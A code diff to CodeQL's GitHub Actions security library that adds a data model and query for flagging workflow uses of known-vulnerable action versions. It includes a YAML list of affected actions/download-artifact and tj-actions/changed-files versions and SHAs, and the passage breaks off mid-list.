e920a558c73e..e05e3a8c41cb 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1146,7 +1146,9 @@ abstract class UsesImpl extends AstNodeImpl { abstract string getVersion(); - int getMajorVersion() { result = this.getVersion().regexpReplaceAll("\\..*", "").toInt() } + int getMajorVersion() { + result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() + } /** Gets the argument expression for the given key. */ string getArgument(string key) { @@ -1192,10 +1194,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ - override string getVersion() { - result = u.getValue().regexpCapture(usesParser(), 3).regexpReplaceAll("^v", "") - } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" @@ -1227,12 +1227,12 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } - /** Gets the version reference used when checking out the Action, e.g. `2` in `actions/checkout@v2`. */ + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | n.lookup("uses") = name and if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(repoUsesParser(), 4).regexpReplaceAll("^v", "") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) else none() ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index efd8b26510b7..fb1ae9af14db 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -114,3 +114,17 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + * - vulnerable_version: vulnerable version + * - vulnerable_sha: vulnerable sha + * - fixed_version: fixed version + */ +predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +) { + Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 4a492edeadfb..cc1b5553f5f7 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -50,3 +50,10 @@ extensible predicate untrustedEventPropertiesDataModel(string property, string k extensible predicate argumentInjectionSinksDataModel( string regexp, int command_group, int argument_group ); + +/** + * Holds for actions that are known to be vulnerable. + */ +extensible predicate vulnerableActionsDataModel( + string action, string vulnerable_version, string vulnerable_sha, string fixed_version +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9f91af470b29..ce2115847495 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -142,58 +142,14 @@ class DornyPathsFilterSource extends RemoteFlowSource { */ class TJActionsChangedFilesSource extends RemoteFlowSource { TJActionsChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 41 or - u.getVersion() - .matches([ - "56284d8", "9454999", "1c93849", "da093c1", "25ef392", "18c8a4e", "4052680", - "bfc49f4", "af292f1", "56284d8", "fea790c", "95690f9", "408093d", "db153ba", - "8238a41", "4196030", "a21a533", "8e79ba7", "76c4d81", "6ee9cdc", "246636f", - "48566bb", "fea790c", "1aee362", "2f7246c", "0fc9663", "c860b5c", "2f8b802", - "b7f1b73", "1c26215", "17f3fec", "1aee362", "a0585ff", "87697c0", "85c8b82", - "a96679d", "920e7b9", "de0eba3", "3928317", "68b429d", "2a968ff", "1f20fb8", - "87e23c4", "54849de", "bb33761", "ec1e14c", "2106eb4", "e5efec4", "5817a9e", - "a0585ff", "54479c3", "e1754a4", "9bf0914", "c912451", "174a2a6", "fb20f4d", - "07e0177", "b137868", "1aae160", "5d2fcdb", "9ecc6e7", "8c9ee56", "5978e5a", - "17c3e9e", "3f7b5c9", "cf4fe87", "043929e", "4e2535f", "652648a", "9ad1a5b", - "c798a4e", "25eaddf", "abef388", "1c2673b", "53c377a", "54479c3", "039afcd", - "b2d17f5", "4a0aac0", "ce810b2", "7ecfc67", "b109d83", "79adacd", "6e426e6", - "5e2d64b", "e9b5807", "db5dd7c", "07f86bc", "3a3ec49", "ee13744", "cda2902", - "9328bab", "4e680e1", "bd376fb", "84ed30e", "74b06ca", "5ce975c", "04124ef", - "3ee6abf", "23e3c43", "5a331a4", "7433886", "d5414fd", "7f2aa19", "210cc83", - "db3ea27", "57d9664", "0953088", "0562b9f", "487675b", "9a6dabf", "7839ede", - "c2296c1", "ea251d4", "1d1287f", "392359f", "7f33882", "1d8a2f9", "0626c3f", - "a2b1e5d", "110b9ba", "039afcd", "ce4b8e3", "3b6c057", "4f64429", "3f1e44a", - "74dc2e8", "8356a01", "baaf598", "8a4cc4f", "8a7336f", "3996bc3", "ef0a290", - "3ebdc42", "94e6fba", "3dbb79f", "991e8b3", "72d3bb8", "72d3bb8", "5f89dc7", - "734bb16", "d2e030b", "6ba3c59", "d0e4477", "b91acef", "1263363", "7184077", - "cbfb0fd", "932dad3", "9f28968", "c4d29bf", "ce4b8e3", "aa52cfc", "aa52cfc", - "1d6e210", "8953e85", "8de562e", "7c640bd", "2706452", "1d6e210", "dd7c814", - "528984a", "75af1a4", "5184a75", "dd7c814", "402f382", "402f382", "f7a5640", - "df4daca", "602081b", "6e12407", "c5c9b6f", "c41b715", "60f4aab", "82edb42", - "18edda7", "bec82eb", "f7a5640", "28ac672", "602cf94", "5e56dca", "58ae566", - "7394701", "36e65a1", "bf6ddb7", "6c44eb8", "b2ee165", "34a865a", "fb1fe28", - "ae90a0b", "bc1dc8f", "3de1f9a", "0edfedf", "2054502", "944a8b8", "581eef0", - "e55f7fb", "07b38ce", "d262520", "a6d456f", "a59f800", "a2f1692", "72aab29", - "e35d0af", "081ee9c", "1f30bd2", "227e314", "ffd30e8", "f5a8de7", "0bc7d40", - "a53d74f", "9335416", "4daffba", "4b1f26a", "09441d3", "e44053b", "c0dba81", - "fd2e991", "2a8a501", "a8ea720", "88edda5", "be68c10", "b59431b", "68bd279", - "2c85495", "f276697", "00f80ef", "f56e736", "019a09d", "3b638a9", "b42f932", - "8dfe0ee", "aae164d", "09a8797", "b54a7ae", "902e607", "2b51570", "040111b", - "3b638a9", "1d34e69", "b86b537", "2a771ad", "75933dc", "2c0d12b", "7abdbc9", - "675ab58", "8c6f276", "d825b1f", "0bd70b7", "0fe67a1", "7bfa539", "d679de9", - "1e10ed4", "0754fda", "d290bdd", "15b1769", "2ecd06d", "5fe8e4d", "7c66aa2", - "2ecd06d", "e95bba8", "7852058", "81f32e2", "450eadf", "0e956bb", "300e935", - "fcb2ab8", "271bbd6", "e8ace01", "473984b", "032f37f", "3a35bdf", "c2216f6", - "0f16c26", "271468e", "fb063fc", "a05436f", "c061ef1", "489e2d5", "8d5a33c", - "fbfaba5", "1980f55", "a86b560", "f917cc3", "e18ccae", "e1d275d", "00f80ef", - "9c1a181", "5eaa2d8", "188487d", "3098891", "467d26c", "d9eb683", "09a8797", - "8e7cc77", "81ad4b8", "5e2a2f1", "1af9ab3", "55a857d", "62a9200", "b915d09", - "f0751de", "eef9423" - ] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) @@ -207,24 +163,14 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { */ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { TJActionsVerifyChangedFilesSource() { - exists(UsesStep u | + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and u.getCallee() = "tj-actions/verify-changed-files" and + u.getCallee() = vulnerable_action and ( - u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 or - u.getVersion() - .matches([ - "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", - "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", - "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", - "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", - "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", - "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", - "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", - "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", - "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", - "48ddf88" - ] + "%") + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) ) and this.asExpr() = u ) diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll new file mode 100644 index 000000000000..bbb021fe3d55 --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -0,0 +1,23 @@ +import actions +import codeql.actions.config.Config + +class KnownVulnerableAction extends UsesStep { + string vulnerable_action; + string fixed_version; + string vulnerable_version; + string vulnerable_sha; + + KnownVulnerableAction() { + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and + this.getCallee() = vulnerable_action and + (this.getVersion() = vulnerable_version or this.getVersion() = vulnerable_sha) + } + + string getFixedVersion() { result = fixed_version } + + string getVulnerableAction() { result = vulnerable_action } + + string getVulnerableVersion() { result = vulnerable_version } + + string getVulnerableSha() { result = vulnerable_sha } +} diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml new file mode 100644 index 000000000000..eb452983bfc5 --- /dev/null +++ b/ql/lib/ext/config/vulnerable_actions.yml @@ -0,0 +1,641 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: vulnerableActionsDataModel + data: + + # gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate | jq -r '.[] | "- \"\(.name)\", \"\(.sha)\""' + + # + # actions/download-artifact + - ["actions/download-artifact", "v4.1.6", "9c19ed7fe5d278cd354c7dfd5d3b88589c7e2395", "4.1.7"] + - ["actions/download-artifact", "v4.1.5", "8caf195ad4b1dee92908e23f56eeb0696f1dd42d", "4.1.7"] + - ["actions/download-artifact", "v4.1.4", "c850b930e6ba138125429b7e5c93fc707a7f8427", "4.1.7"] + - ["actions/download-artifact", "v4.1.3", "87c55149d96e628cc2ef7e6fc2aab372015aec85", "4.1.7"] + - ["actions/download-artifact", "v4.1.2", "eaceaf801fd36c7dee90939fad912460b18a1ffe", "4.1.7"] + - ["actions/download-artifact", "v4.1.1", "6b208ae046db98c579e8a3aa621ab581ff575935", "4.1.7"] + - ["actions/download-artifact", "v4.1.0", "f44cd7b40bfd40b6aa1cc1b9b5b7bf03d3c67110", "4.1.7"] + - ["actions/download-artifact", "v4.0.0", "7a1cd3216ca9260cd8022db641d960b1db4d1be4", "4.1.7"] + - ["actions/download-artifact", "v3.0.2", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3.0.1", "9782bd6a9848b53b110e712e20e42d89988822b7", "4.1.7"] + - ["actions/download-artifact", "v3.0.0", "fb598a63ae348fa914e94cd0ff38f362e927b741", "4.1.7"] + - ["actions/download-artifact", "v3", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3-node20", "246d7188e736d3686f6d19628d253ede9697bd55", "4.1.7"] + - ["actions/download-artifact", "v2.1.1", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v2.1.0", "f023be2c48cc18debc3bacd34cb396e0295e2869", "4.1.7"] + - ["actions/download-artifact", "v2.0.10", "3be87be14a055c47b01d3bd88f8fe02320a9bb60", "4.1.7"] + - ["actions/download-artifact", "v2.0.9", "158ca71f7c614ae705e79f25522ef4658df18253", "4.1.7"] + - ["actions/download-artifact", "v2.0.8", "4a7a711286f30c025902c28b541c10e147a9b843", "4.1.7"] + - ["actions/download-artifact", "v2.0.7", "f144d3c3916a86f4d6b11ff379d17a49d8f85dbc", "4.1.7"] + - ["actions/download-artifact", "v2.0.6", "f8e41fbffeebb48c0273438d220bb2387727471f", "4.1.7"] + - ["actions/download-artifact", "v2.0.5", "c3f5d00c8784369c43779f3d2611769594a61f7a", "4.1.7"] + - ["actions/download-artifact", "v2.0.4", "b3cedea9bed36890c824f4065163b667eeca272b", "4.1.7"] + - ["actions/download-artifact", "v2.0.3", "80d2d4023c185001eacb50e37afd7dd667ba8044", "4.1.7"] + - ["actions/download-artifact", "v2.0.2", "381af06b4268a1e0ad7b7c7e5a09f1894977120f", "4.1.7"] + - ["actions/download-artifact", "v2.0.1", "1ac47ba4b6af92e65d0438b64ce1ea49ce1cc48d", "4.1.7"] + - ["actions/download-artifact", "v2.0", "1de1dea89c32dcb1f37183c96fe85cfe067b682a", "4.1.7"] + - ["actions/download-artifact", "v2", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "v1", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + + # tj-actions/changed-files + # https://github.com/advisories/GHSA-mcph-m25j-8j63 + # CVE-2023-51664 + - ["tj-actions/changed-files", "v40.2.3", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v40.2.2", "94549999469dbfa032becf298d95c87a14c34394", "41"] + - ["tj-actions/changed-files", "v40.2.1", "1c938490c880156b746568a518594309cfb3f66b", "41"] + - ["tj-actions/changed-files", "v40.2.0", "da093c1609db0edd0a037ce9664e135f74bf30d9", "41"] + - ["tj-actions/changed-files", "v40.1.1", "25ef3926d147cd02fc7e931c1ef50772bbb0d25d", "41"] + - ["tj-actions/changed-files", "v40.1.0", "18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b", "41"] + - ["tj-actions/changed-files", "v40.0.2", "40526807ee1e208a1a8c1bbe6bd2d1b044ef6368", "41"] + - ["tj-actions/changed-files", "v40.0.1", "bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438", "41"] + - ["tj-actions/changed-files", "v40.0.0", "af292f1e845a0377b596972698a8598734eb2796", "41"] + - ["tj-actions/changed-files", "v40", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v39.2.4", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v39.2.3", "95690f9ece77c1740f4a55b7f1de9023ed6b1f87", "41"] + - ["tj-actions/changed-files", "v39.2.2", "408093d9ff9c134c33b974e0722ce06b9d6e8263", "41"] + - ["tj-actions/changed-files", "v39.2.1", "db153baf731265ad02cd490b07f470e2d55e3345", "41"] + - ["tj-actions/changed-files", "v39.2.0", "8238a4103220c636f2dad328ead8a7c8dbe316a3", "41"] + - ["tj-actions/changed-files", "v39.1.2", "41960309398d165631f08c5df47a11147e14712b", "41"] + - ["tj-actions/changed-files", "v39.1.1", "a21a533a0c244a27daac02f9dc6fcf8aeb996154", "41"] + - ["tj-actions/changed-files", "v39.1.0", "8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d", "41"] + - ["tj-actions/changed-files", "v39.0.3", "76c4d81a6acd339b55bd7407a016981c853eb702", "41"] + - ["tj-actions/changed-files", "v39.0.2", "6ee9cdc5816333acda68e01cf12eedc619e28316", "41"] + - ["tj-actions/changed-files", "v39.0.1", "246636f5fa148b5ad8e65ca4c57b18af3123e5f6", "41"] + - ["tj-actions/changed-files", "v39.0.0", "48566bbcc22ceb7c5809ebdd27377309f2c3de8c", "41"] + - ["tj-actions/changed-files", "v39", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v38.2.2", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v38.2.1", "2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a", "41"] + - ["tj-actions/changed-files", "v38.2.0", "0fc9663aa70243d87319dbd32fd926344d18d38f", "41"] + - ["tj-actions/changed-files", "v38.1.3", "c860b5c47fa71f461da850094ef2f6e3d6514e44", "41"] + - ["tj-actions/changed-files", "v38.1.2", "2f8b80270f04e421b28efb2abaccef4fce4815b6", "41"] + - ["tj-actions/changed-files", "v38.1.1", "b7f1b7347fea1df67230801b66081fe3cba7dc69", "41"] + - ["tj-actions/changed-files", "v38.1.0", "1c26215f3fbd51eba03bc199e5cbabdfc3584ce3", "41"] + - ["tj-actions/changed-files", "v38.0.0", "17f3fec1edef0c3916d59cbcee1585fcd457e456", "41"] + - ["tj-actions/changed-files", "v38", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v37.6.1", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v37.6.0", "87697c0dca7dd44e37a2b79a79489332556ff1f3", "41"] + - ["tj-actions/changed-files", "v37.5.2", "85c8b8252fc9893e00b3633a16670e53040e6d71", "41"] + - ["tj-actions/changed-files", "v37.5.1", "a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce", "41"] + - ["tj-actions/changed-files", "v37.5.0", "920e7b9ae1d45913fc81f86c956fee89c77d2e5e", "41"] + - ["tj-actions/changed-files", "v37.4.0", "de0eba32790fb9bf87471b32855a30fc8f9d5fc6", "41"] + - ["tj-actions/changed-files", "v37.3.0", "39283171cefdf491e0f0d6cf285b86b31eb6f3cd", "41"] + - ["tj-actions/changed-files", "v37.2.0", "68b429ddc666ea0dba46309e1ee45e06bb408df8", "41"] + - ["tj-actions/changed-files", "v37.1.2", "2a968ff601949c81b47d9c1fdb789b0d25ddeea2", "41"] + - ["tj-actions/changed-files", "v37.1.1", "1f20fb83f05eabed6e12ba0329edac8b6ec8e207", "41"] + - ["tj-actions/changed-files", "v37.1.0", "87e23c4c79a603288642711155953c7da34b11ac", "41"] + - ["tj-actions/changed-files", "v37.0.5", "54849deb963ca9f24185fb5de2965e002d066e6b", "41"] + - ["tj-actions/changed-files", "v37.0.4", "bb3376162b179308a79fc4450262a15a8e1d6888", "41"] + - ["tj-actions/changed-files", "v37.0.3", "ec1e14cf27f4585783f463070881b2c499349a8a", "41"] + - ["tj-actions/changed-files", "v37.0.2", "2106eb4457dd2aba4d37c8cdd16acba5d18739b9", "41"] + - ["tj-actions/changed-files", "v37.0.1", "e5efec47f620e0fde64a1ad8f53bbf53d51a8c97", "41"] + - ["tj-actions/changed-files", "v37.0.0", "5817a9efb0d7cc34b917d8146ea10b9f32044968", "41"] + - ["tj-actions/changed-files", "v37", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v36.4.1", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v36.4.0", "e1754a427f478b8778d349341b8f1d80f1f47f44", "41"] + - ["tj-actions/changed-files", "v36.3.0", "9bf09145c3560e451e8d8e87b42ccb3fef5b692d", "41"] + - ["tj-actions/changed-files", "v36.2.1", "c9124514c375de5dbb9697afa6f2e36a236ee58c", "41"] + - ["tj-actions/changed-files", "v36.2.0", "174a2a6360b54a2019877c254c4be78106efc94f", "41"] + - ["tj-actions/changed-files", "v36.1.0", "fb20f4d24890fadc539505b1746d260504b213d0", "41"] + - ["tj-actions/changed-files", "v36.0.18", "07e0177b72d3640efced741cae32f9861eee1367", "41"] + - ["tj-actions/changed-files", "v36.0.17", "b13786805affca18e536ed489687d3d8d1f05d21", "41"] + - ["tj-actions/changed-files", "v36.0.16", "1aae16084af435f73c8cdfd742473028810c5f20", "41"] + - ["tj-actions/changed-files", "v36.0.15", "5d2fcdb4cbef720a52f49fd05d8c7edd18a64758", "41"] + - ["tj-actions/changed-files", "v36.0.14", "9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1", "41"] + - ["tj-actions/changed-files", "v36.0.13", "8c9ee56d0180a538ad5b6b8a208e4db974bad9c0", "41"] + - ["tj-actions/changed-files", "v36.0.12", "5978e5a2df95ef20cde627d4acb5edd1f87ba46a", "41"] + - ["tj-actions/changed-files", "v36.0.11", "17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9", "41"] + - ["tj-actions/changed-files", "v36.0.10", "3f7b5c900bdbf1b80a825e220413986227b3ff03", "41"] + - ["tj-actions/changed-files", "v36.0.9", "cf4fe8759a45edd76ed6215da3529d2dbd2a3c68", "41"] + - ["tj-actions/changed-files", "v36.0.8", "043929ee8fffa1dd1d619782a5a338cf39e76e23", "41"] + - ["tj-actions/changed-files", "v36.0.7", "4e2535f2b330e70ff7055f7de4272653cfdbd555", "41"] + - ["tj-actions/changed-files", "v36.0.6", "652648acb4f32660a94e245a2a51c6d0e56b2a1d", "41"] + - ["tj-actions/changed-files", "v36.0.5", "9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71", "41"] + - ["tj-actions/changed-files", "v36.0.4", "c798a4ea57f0e0a9d2b5374853c9c479ebb435a2", "41"] + - ["tj-actions/changed-files", "v36.0.3", "25eaddf37ae893cec889065e9a60439c8af6f089", "41"] + - ["tj-actions/changed-files", "v36.0.2", "abef388dd913ce13a650bbf800eba73961657fb9", "41"] + - ["tj-actions/changed-files", "v36.0.1", "1c2673b763ea086acd660dd4257c9be06eb77667", "41"] + - ["tj-actions/changed-files", "v36.0.0", "53c377a374b445ec2a61e343068807bf41f2c9a6", "41"] + - ["tj-actions/changed-files", "v36", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v35.9.3", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35.9.3-sec", "8663bb8fc810b983a35585a2dd6a121c09d2590d", "41"] + - ["tj-actions/changed-files", "v35.9.2", "b2d17f51244a144849c6b37a3a6791b98a51d86f", "41"] + - ["tj-actions/changed-files", "v35.9.2-sec", "4fc4e9d28ecb58e0215483343f3dd2fd01178f42", "41"] + - ["tj-actions/changed-files", "v35.9.1", "4a0aac0d19aa2838c6741fdf95a5276390418dc2", "41"] + - ["tj-actions/changed-files", "v35.9.1-sec", "89daa3bca3cd1f2967097668c0e8b5f7dda4d57f", "41"] + - ["tj-actions/changed-files", "v35.9.0", "ce810b29b28abf274afebdcd8fe47b8fba0f28bd", "41"] + - ["tj-actions/changed-files", "v35.9.0-sec", "2e61fb6a48f5857e3a338b4cbf071e1164c060e9", "41"] + - ["tj-actions/changed-files", "v35.8.0", "7ecfc6730dff8072d1cc5215a24cc9478f55264d", "41"] + - ["tj-actions/changed-files", "v35.8.0-sec", "21d7a75834ad73fed7fa33b39b73ebe6495ee4e1", "41"] + - ["tj-actions/changed-files", "v35.7.12", "b109d83a62e94cf7c522bf6c15cb25c175850b16", "41"] + - ["tj-actions/changed-files", "v35.7.12-sec", "2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60", "41"] + - ["tj-actions/changed-files", "v35.7.11", "79adacd43ea069e57037edc891ea8d33013bc3da", "41"] + - ["tj-actions/changed-files", "v35.7.11-sec", "123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6", "41"] + - ["tj-actions/changed-files", "v35.7.10", "6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c", "41"] + - ["tj-actions/changed-files", "v35.7.10-sec", "61bf27253df806648581aaddd4a8ec394b968c80", "41"] + - ["tj-actions/changed-files", "v35.7.9", "5e2d64b30d51d557c5a29309ecbd5481a236ec77", "41"] + - ["tj-actions/changed-files", "v35.7.9-sec", "b94d96993dacb3158c51d22c3afae1f4059a71d2", "41"] + - ["tj-actions/changed-files", "v35.7.8", "e9b5807e928fc8eea705c90da5524fd44b183ba1", "41"] + - ["tj-actions/changed-files", "v35.7.8-sec", "22bed7e94fbb176468579214290dfd84abc6ea86", "41"] + - ["tj-actions/changed-files", "v35.7.7", "db5dd7c176cf59a19ef6561bf1936f059dee4b74", "41"] + - ["tj-actions/changed-files", "v35.7.7-sec", "7795905b24e743c8c33cd5ba5cd256cc92c81f68", "41"] + - ["tj-actions/changed-files", "v35.7.6", "07f86bcdc42639264ec561c7f175fea5f532b6ce", "41"] + - ["tj-actions/changed-files", "v35.7.6-sec", "08d9eb809753cbbaf6c8256285605312ce3987b9", "41"] + - ["tj-actions/changed-files", "v35.7.5", "3a3ec498d8976e74f5dd829c413c1d446e738df7", "41"] + - ["tj-actions/changed-files", "v35.7.4", "ee137444f0b3b0855cb2fc7df807416ba2c3d311", "41"] + - ["tj-actions/changed-files", "v35.7.3", "cda290230383045a8887a250c2abf796bf1dc6da", "41"] + - ["tj-actions/changed-files", "v35.7.2", "9328bab880abf4acc377d77718d28c6ac167f154", "41"] + - ["tj-actions/changed-files", "v35.7.1", "4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7", "41"] + - ["tj-actions/changed-files", "v35.7.1-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v35.7.0", "bd376fbcfae914347656e4c70801e2a3fafed05b", "41"] + - ["tj-actions/changed-files", "v35.7.0-sec", "1d1543af8cef13eb42c756e9425e2cc50e8030b0", "41"] + - ["tj-actions/changed-files", "v35.6.4", "84ed30e2f4daf616144de7e0c1db59d5b33025e3", "41"] + - ["tj-actions/changed-files", "v35.6.3", "74b06cafc9658d2a91cc5ceb920fd6b5a5649051", "41"] + - ["tj-actions/changed-files", "v35.6.2", "5ce975c6021a0b11062c547acb6c26c96a34a8c5", "41"] + - ["tj-actions/changed-files", "v35.6.1", "04124efe7560d15e11ea2ba96c0df2989f68f1f4", "41"] + - ["tj-actions/changed-files", "v35.6.0", "3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60", "41"] + - ["tj-actions/changed-files", "v35.5.6", "23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1", "41"] + - ["tj-actions/changed-files", "v35.5.5", "5a331a4999f9f21a3ef2a6459edee90393a8b92a", "41"] + - ["tj-actions/changed-files", "v35.5.4", "74338865c1e73fee674ce5cfc5d28f4b9caa33bc", "41"] + - ["tj-actions/changed-files", "v35.5.3", "d5414fd30b0b7618c815fe7ebe5673720e081937", "41"] + - ["tj-actions/changed-files", "v35.5.2", "7f2aa19bdcf4a00195671e368091a1e32a694ac5", "41"] + - ["tj-actions/changed-files", "v35.5.1", "210cc839c24f532fe4fbf510b7b3314ca9a2b90b", "41"] + - ["tj-actions/changed-files", "v35.5.0", "db3ea27a0cf07135175be5efe7aaf84df6e0e6f0", "41"] + - ["tj-actions/changed-files", "v35.4.4", "57d9664f8e2aa45f26bcb59095f99aa47ae8e90d", "41"] + - ["tj-actions/changed-files", "v35.4.3", "0953088baa540166372190bec608cad1603a787d", "41"] + - ["tj-actions/changed-files", "v35.4.2", "0562b9f865df79542dfcd59cfbd14c9ac9a792d3", "41"] + - ["tj-actions/changed-files", "v35.4.1", "487675b843e203b5c9a92a07f1ed763d046d7283", "41"] + - ["tj-actions/changed-files", "v35.4.0", "9a6dabf8d15381f97f1c770257a1a0db59c28a47", "41"] + - ["tj-actions/changed-files", "v35.3.2", "7839ede089e483df865be448d6f3652f875005e0", "41"] + - ["tj-actions/changed-files", "v35.3.1", "c2296c1b044b4f5c97d310a6d31e95cbcb5583ec", "41"] + - ["tj-actions/changed-files", "v35.3.0", "ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e", "41"] + - ["tj-actions/changed-files", "v35.2.1", "1d1287f9fafd92be283f99b781fb5f00f00dd471", "41"] + - ["tj-actions/changed-files", "v35.2.0", "392359fc8c85be1a8752e9ab6b1ad9e45158b4a9", "41"] + - ["tj-actions/changed-files", "v35.1.2", "7f33882a1271950f8592f96b77e694436bfee83b", "41"] + - ["tj-actions/changed-files", "v35.1.1", "1d8a2f91371fd14ec6146c37cbae79526144fbe9", "41"] + - ["tj-actions/changed-files", "v35.1.0", "0626c3f94002c0a9d7491dd7fed7055bbdff6f92", "41"] + - ["tj-actions/changed-files", "v35.0.1", "a2b1e5dbb92d21753cf198228fbf2d0a8557f117", "41"] + - ["tj-actions/changed-files", "v35.0.0", "110b9baa5fc65597d65c1d019c6d3aee16d00c53", "41"] + - ["tj-actions/changed-files", "v35", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v34.6.2", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", 